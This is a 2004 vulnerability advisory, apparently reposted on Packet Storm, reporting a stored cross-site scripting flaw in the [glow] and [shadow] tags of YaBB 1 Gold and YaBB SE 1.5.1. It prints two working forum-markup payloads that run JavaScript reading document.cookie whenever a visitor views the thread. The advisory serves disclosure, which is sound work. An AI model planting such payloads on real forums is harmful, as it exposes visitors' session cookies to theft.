YaBB 1 Gold and YaBB SE 1.5.1 Final are both susceptible cross site scripting attacks.
a7f9088dbb62d0ccaacc4cb36fbe64c2510ec07a174ee7239c8ac9e9139f9d0a
#####################################################################
Advisory Name : YaBB/YaBBse Cross Site Scripting Vulnerability
Release Date : Mar 14,2004
Application : YaBB/YaBBse
Test On : YaBB 1 Gold(SP1.3)
YaBB SE 1.5.1 Final
Vendor URL : http://www.yabbforum.com/
http://www.yabbse.org/
Discover : Cheng Peng Su(apple_soup_at_msn.com)
#####################################################################
Proof of conecpt:
The problem is in [glow] and [shadow] tag,yabb doesn't filter
the charactor in this tag,attack needn't visitor to click any
links,just when the vistor read the thread,XSS code will be
executed.
Exploit:
[glow=red);background:url(javascript:alert(document.cookie));filte
r:glow(color=red,2,300]Big Exploit[/glow]
[shadow=red);background:url(javascript:alert(document.cookie));fil
ter:shadow(color=red,left,300]Big Exploit[/shadow]
Contact:
Cheng Peng Su
Class 1,Senior 2,High school attached to Wuhan University
Wuhan,Hubei,China(430072)
apple_soup_at_msn.com
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed